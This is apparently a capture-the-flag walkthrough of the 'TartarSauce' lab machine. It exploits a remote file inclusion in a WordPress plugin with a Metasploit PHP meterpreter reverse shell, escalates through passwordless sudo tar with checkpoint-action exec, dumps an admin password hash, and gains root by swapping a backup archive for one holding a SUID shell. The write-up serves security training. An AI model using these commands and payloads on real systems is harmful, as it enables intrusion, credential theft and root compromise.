[+] Name: akismet - v4.0.3 | Last updated: 2018-06-19T18:18:00.000Z | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/ | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt [!] The version is out of date, the latest version is 4.0.8
[+] Name: gwolle-gb - v2.3.10 | Last updated: 2018-09-07T19:44:00.000Z | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/ | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt [!] The version is out of date, the latest version is 2.6.3
The last one (gwolle-gb) is marked as vulnerable for XSS but from exploitdb we found that the plugin is also vulnerable to RFI.
HTTP GET parameter abspath is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named wp-load.php from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious wp-load.php file into his server document root and includes server’s URL into request:
N.B.: in order to works this exploit need allow_url_include to be enabled. Otherwise, attacker may still include local files and also execute arbitrary code.
First we set up a meterpreter listener for a web_delivery to create the content of the wp-load.php file:
msfconsole -x "use exploit/multi/script/web_delivery; set URIPATH dodometer; set LPORT 3487; set LHOST $(ip addr show tun0 | grep -Po "inet \K[\d.]+"); set SRVHOST $(ip addr show tun0 | grep -Po "inet \K[\d.]+"); set target PHP; set payload php/meterpreter/reverse_tcp; run -j"
Now the file to be served (wp-load.php) with the classic python -m http.server 80:
Issuing the request http http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.95/ we got a meterpreter session.
python -c 'import pty; pty.spawn("/bin/bash")'
From /etc/passwd we saw the the main user is onuma so we need to find a way to privesc from www-data:
Listing user sudo privileges we got an interesting result:
1 2 3 4 5 6 7
www-data@TartarSauce:/tmp$ sudo -l Matching Defaults entries for www-data on TartarSauce: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce: (onuma) NOPASSWD: /bin/tar
User www-data can run tar with sudo without password. tar command can be abused to execute commands: https://gtfobins.github.io/#tar. So we can easily get a onuma shell with:
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
for a more stable and powerful shell we migrate the /bin/bash to a meterpreter session for user onuma and read the first flag:
From mysql we got the wpadmin hash:
1 2 3 4 5 6 7 8
mysql> select user_login, user_pass from wp_users; select user_login, user_pass from wp_users; +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | wpadmin | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 | +------------+------------------------------------+ 1 row in set (0.00 sec)
And using LinEnum we saw an unusual systemd timer and service:
#------------------------------------------------------------------------------------- # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ # ONUMA Dev auto backup program # This tool will keep our webapp backed up incase another skiddie defaces us again. # We will be able to quickly restore from a backup in seconds ;P #-------------------------------------------------------------------------------------
# Set Vars Here basedir=/var/www/html bkpdir=/var/backups tmpdir=/var/tmp testmsg=$bkpdir/onuma_backup_test.txt errormsg=$bkpdir/onuma_backup_error.txt tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1) check=$tmpdir/check
# formatting printbdr() { for n in $(seq 72); do /usr/bin/printf $"-"; done } bdr=$(printbdr)
# Added a test file to let us see when the last backup was run /usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time. /bin/rm -rf $tmpdir/.* $check
# Added delay to wait for backup to complete if large files get added. /bin/sleep 30
# Test the backup integrity integrity_chk() { /usr/bin/diff -r $basedir$check$basedir }
/bin/mkdir $check /bin/tar -zxvf $tmpfile -C $check if [[ $(integrity_chk) ]] then # Report errors so the dev can investigate the issue. /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg integrity_chk >> $errormsg exit 2 else # Clean up and save archive to the bkpdir. /bin/mv $tmpfile$bkpdir/onuma-www-dev.bak /bin/rm -rf $check .* exit 0 fi
This script is used to temporally check if something from the /var/www/html folder is changed. The first thing that triggered us is the use of -C options with tar: this option do not change ownerships and permissions on archive folder so the extracted files are the same.
We can create an archive with a SUID binary to spawn a root shell.
wait for the script to generate the hidden $tmpfile
substitute the $tmpfile archive with the one with the SUID shell.
avoid the deletion of all files in $check path.
run the shell.
We can hijack the script to extract our archive in /var/tmp/check/: the crafted archive must me created using the same base path of the original so we can trigger the integrity_chk to fail.
For the first step we can write a script looping until the file is created and then move the crafted archive to the correct path and with the same name.
For the SUID binary we wrote a C program to spawn a /bin/bash shell:
if (setuid(0) != 0) { perror("Setuid failed, no suid-bit set?"); return1; } setgid(0); seteuid(0); setegid(0); setgroups(1, &newGrp);
execvp("/bin/bash", argv);
return0; }
and with gcc -m32 shell.c -o var/www/html/shell we compiled the code.
We must use the var/www/html/ path because the script will check the diff from /var/www/html and /var/tmp/check/var/www/html/ and we need this check to fail avoiding /bin/rm -rf $check .*. Once bypassed this step we should have the SUID binary in /var/tmp/check/var/www/html.
To create the archive we first must set ownerships and SUID on the compiled shell.
With tar we create the archive: tar -czvf dodo.tar.gz var/www/html/*.
Once uploaded (in /tmp/.dodo) we started the script to monitor the creation of the hidden file in /var/tmp/:
1 2 3 4 5 6 7 8
#!/usr/bin/env bash
while [[ ! -d check ]]; do : done
filename=$(\ls -a .????????????????????*) cp /tmp/.dodo/dodo.tar.gz "${filename}"
Once the file is create, read the filename and substitute it with out archive in /tmp/.dodo. After a while (~5 mins) the systemd timer went off the we got the extracted files in check/ folder.
Running /var/tmp/check/var/www/html/shell we got a root bash!